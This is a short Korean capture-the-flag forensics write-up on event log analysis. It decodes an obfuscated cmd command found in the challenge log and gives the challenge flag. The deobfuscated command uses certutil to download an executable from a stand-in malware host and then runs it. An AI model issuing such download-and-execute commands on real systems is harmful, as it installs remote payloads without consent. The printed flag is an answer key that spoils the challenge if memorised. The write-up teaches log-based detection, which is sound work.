1. Description
시스템에서 기록된 이벤트 분석은 포렌식 기술의 기본이다. 이번 문제는 이벤트 분석 기술을 평가한다.
Detect anomalies through event log analysis!
2. Write up
문제 로그파일을 확인해보면 2021-05-21 오후 6:17:14에 cmd를 실행한 흔적을 찾을 수 있다.
cmd 명령어는 난독화가 되어있고 각 난독화 되어 있는 변수들은 각각 특정 문자와 맵핑 되어있다.
cmd /c certutil -urlcache -f http://you.know.i.don.t.l1k3.m4lw4r3.rea.ly/ out.exe && out.exe && cce2021{1f77b9bdefdae17e74e45a273530fd45}
Bash
복사
각 난독화 되있는 명령어를 치환하면 위와 같은 결과가 나온다.
3. FLAG
cce2021{1f77b9bdefdae17e74e45a273530fd45}